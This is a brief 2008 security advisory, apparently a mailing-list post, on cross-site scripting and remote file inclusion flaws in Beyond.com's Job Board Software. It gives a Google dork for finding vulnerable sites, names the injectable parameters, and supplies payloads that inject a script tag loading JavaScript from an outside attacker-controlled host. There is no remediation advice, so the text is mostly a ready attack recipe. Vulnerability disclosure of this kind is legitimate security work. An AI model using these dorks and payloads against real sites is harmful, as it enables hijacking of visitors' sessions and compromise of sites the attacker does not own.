+=============================================================================+
+  Job Board Software ALL Versions XSS & RFI Multiple Remote Vulnerabilities  +
+=============================================================================+


Author(s): Ivan Sanchez & Maximiliano Soler.

Product: Job Board Software.

Web: http://www.beyond.com/

Versions: ALL Versions  Copyright 2001-2008 Beyond.com.

Date: 11/02/2008




GOOGLE DORKS:
------------
[+] inurl:"/JS/Form/SearchForm.asp"



EXPLOIT:
--------


http://www.[DOMAIN].tld/JS/Form/SearchForm.asp


Name External Variable= Keyword Type
Name Internal Variable= FKeywords




[1]- Example form:

Keyword Type = "><script src=http://DOMAIN/scripts/exploit-code.js></script>


[2]- Tampering Attack:

FKeywords="><script src=http://DOMAIN/exploit.js></script>


[3]- More XSS / RFI founded in this application .


NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+=============================================================================+
+  Job Board Software ALL Versions XSS & RFI Multiple Remote Vulnerabilities  +
+=============================================================================+

-- 
     Maximiliano Soler.
  Reports & Review Code.

    Null Code Services.
    www.nullcode.com.ar

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.